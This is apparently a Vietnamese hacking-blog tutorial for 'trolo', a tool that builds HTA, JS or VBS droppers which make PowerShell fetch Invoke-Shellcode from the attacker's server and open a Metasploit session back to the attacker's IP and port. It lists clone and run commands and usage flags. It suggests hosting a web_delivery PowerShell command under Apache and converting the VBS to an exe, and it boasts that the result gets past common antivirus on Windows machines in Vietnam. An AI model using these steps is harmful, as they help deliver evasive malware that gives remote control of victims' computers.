Tác giả: Viết bởi b3rito tại mes3hacklab
Yêu Cầu hệ thống: Đã cài đặt Metasploit Framework hoặc PowerSploit
Nếu hệ thống chưa cài đặt Metasploit Framework bạn có thể tham khảo Video cài đặt Metasploit Framework của admin Nguyễn Anh Kiệt tại đây
https://www.youtube.com/watch?v=4wYb9dE56XI
Hướng dẫn cài đặt
B1: Clone Tool từ GitHub: git clone https://github.com/b3rito/trolo
B2: Tiến hành cấp quyền và cài đặt nó
cd trolo
chmod +x trolo.sh
sudo ./trolo.sh
Hướng dẫn sử dụng
Tổng quát: ./trolo.sh -i [IP] -p [PORT] -n [TÊN FILE OUTPUT] -f [FORMAT] -a [KIẾN TRÚC – ARCH]
- -i : Địa chỉ IP máy Hacker
- -p : Port Hacker muốn sử dụng
- -n : Tên file xuất ra (Mặc định: PAYLOAD)
- -a : Kiến trúc: x86 (32bit0 hoặc x64 (64bit)
- -f : Định dạng xuất ra: hta, js, vbs, tùy chọn
- -g : Điền Full URL để Powershell lấy file txt xuống. VD: http://IP của bạn/abc.txt
- -q : Nhập UR L để Powershell lấy file Invoke-Shellcode.ps1 từ đó
- -u : Cập nhật Tool
Các bạn có thể sử dụng module web_deleverly của Meatasploit để tạo ra câu lệnh powershell để cho nó vào file .txt. Sau đó bạn có thể cho nó vào thư mục của apache2 (/var/www/html) để thực thi dễ dàng
Sau đó các bạn có thể sử dụng 1 vài tool nhỏ để chuyển fie VBS thành file exe
Khi đem đi test thì với các AV phổ biến cho các máy tính Windows ở VN. Thì mức độ bypass Antivirus tôi cho là tạm chấp nhận được
Views: 1553